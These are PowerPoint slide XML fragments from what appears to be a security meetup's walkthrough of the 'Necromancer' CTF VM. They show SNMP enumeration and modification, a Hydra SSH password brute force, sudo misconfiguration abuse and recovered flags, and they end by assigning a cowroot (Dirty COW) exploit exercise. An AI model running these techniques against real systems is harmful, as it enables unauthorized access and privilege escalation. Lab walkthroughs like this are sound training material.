            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -v2c -On -c death2allrw 192.168.56.101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.1.3.6.1.2.1.1.1.0 = STRING: "You stand in front of a door."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.1.3.6.1.2.1.1.2.0 = OID: .1.3.6.1.4.1.8072.3.2.255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.1.3.6.1.2.1.1.3.0 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Timeticks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: (2716543) 7:32:45.43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.1.3.6.1.2.1.1.4.0 = STRING: "The door is Locked. If you choose to defeat me, the door must be Unlocked."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.1.3.6.1.2.1.1.5.0 = STRING: "Fear the Necromancer!" </a:t>
            </a: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1.3.6.1.2.1.1.6.0 = STRING: "Locked - death2allrw!"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.1.3.6.1.2.1.1.8.0 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Timeticks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: (1) 0:00:00.01 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.1.3.6.1.2.1.1.9.1.2.1 = OID: .1.3.6.1.6.3.11.3.1.1 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.&lt;snip&gt;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307871735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So…SET the .1.3.6.1.2.1.1.6.0 = STRING: "Locked - death2allrw!” parameter to be Unlocked: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snmpset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-v 2c -c death2allrw 192.168.56.101 .1.3.6.1.2.1.1.6.0 s “Unlocked" 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—&gt; Name/OID: sysLocation.0; Value (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OctetString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>flag7{9e5494108d10bbd5f9e7ae52239546c4} - t22 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And…..it’s another MD5…the plain of flag 7 9e5494108d10bbd5f9e7ae52239546c4 is ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>demonslayer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'!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3558016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Brute </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>force using Hydra against the SSH service using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>demonslayer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as the username: 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hydra -l </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>demonslayer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -P /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/share/wordlists/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rockyou.txt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ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>://192.168.56.101:22 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hydra (http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.thc.org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thc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-hydra) starting at 2016-06-26 06:07:56 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[DATA] max 16 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~14008 tries per task </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[DATA] attacking service </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> on port 22 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[22][</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>] host: 192.168.56.101   login: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>demonslayer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   password: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>12345678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1 of 1 target successfully completed, 1 valid password found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136404464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Welcome!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Hello Nerds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					      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# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> demonslayer@192.168.56.101 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>demonslayer@192.168.56.101's password:  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$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pwd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/home/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>demonslayer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$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -al </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>total 40 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>drwxr</a:t>
            </a:r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xr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-x  3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>demonslayer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>demonslayer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  512 Jun 23 05:38 .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&lt;snip&gt;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rw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-r--r--  1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>demonslayer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>demonslayer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  706 May 11 21:19 flag8.txt </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$ more flag8.txt                                                                                                                 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>You enter the Necromancer's Lair!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&lt;snip&gt;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Defend yourself!  Counter attack the Necromancer's spells at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>u777</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>! </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$ 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17391913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listen to UDP port 777 from the SSH session: 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nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -u 127.0.0.1 777 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>** You only have 3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hitpoints</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> left! ** </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Defend yourself from the Necromancer's Spells! </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Where do the Black Robes practice magic of the Greater Path?  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Kelewan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flag8{55a6af2ca3fee9f2fef81d20743bda2c}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Who </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>did Johann Faust VIII make a deal with?  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mephistopheles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flag9{713587e17e796209d1df4c9c2c2d2966}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Who </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>is tricked into passing the Ninth Gate?  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hedge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flag10{8dc6486d2c63cafcdc6efbba2be98ee4} </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A great flash of light knocks you to the ground; momentarily blinding you!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&lt;snip&gt;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the ground is a small vile.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37276093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the small vile: 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–al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rw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-r--r--  1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>demonslayer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>demonslayer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  196 Jun 25 09:52 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smallvile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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>more .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>smallvile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                                                                                                               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pick up the small vile. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Inside of it you can see a green liquid. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Opening the vile releases a pleasant </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>odour</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> into the air. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>You drink the elixir and feel a great power within your veins!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Remembered that previously I got a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error: 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find . -name flag -print |more </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Password:  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>demonslayer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is not in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudoers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> file.  This incident will be reported.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6562805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try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-l now to list privy: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-l </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Matching Defaults entries for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>demonslayer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thenecromancer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env_keep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+="FTPMODE PKG_CACHE PKG_PATH SM_PATH SSH_AUTH_SOCK" </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1778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User </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>demonslayer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> may run the following commands on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>thenecromancer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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(ALL) NOPASSWD: /bin/cat /root/flag11.txt </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>And there she is!!! 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rgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> cat /root/flag11.txt </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Suddenly you feel dizzy and fall to the ground! </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>As you open your eyes you find yourself staring at a computer screen. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Congratulations!!! You have conquered......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NECROMANCER!  by  @</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xerubus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                  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>flag11{42c35828545b926e79a36493938ab1b1}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53369090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Speakers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73908" y="1825625"/>
            <a:ext cx="1159127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#1 N1nj4 N1gh7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-AU" sz="3600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-AU" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Thanks </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="3600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ospray</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> for creating tonight’s CTF Challenge:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-AU" sz="2000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1. Import VM &amp; Configure NIC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2. SSH to machine using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>test:lamepassword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2"/>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3. Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cowroot.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to gain access to /root/flag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-AU" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Tip: Think about where the best place to compile may be…</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-AU" sz="3600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-AU" sz="3600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/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Date: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="3600" b="1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January 2017 TBC, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="36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17:30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lang="en-AU" sz="11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Clr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="25000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Speaker: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Title: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r>
              <a:rPr lang="en-AU" sz="3600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lang="en-AU" sz="36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http://j.mp/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="36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sectalkscfp</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="3600" b="0" i="0" u="none" strike="noStrike" cap="none" baseline="0" dirty="0" smtClean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n-AU"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Have a great Christmas &amp; New Year!!</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="36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B33rz &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="4400" b="0" i="0" u="none" strike="noStrike" cap="none" baseline="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Nomz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Canton Bar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7071" y="5085396"/>
            <a:ext cx="792864" cy="104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137003" y="2246865"/>
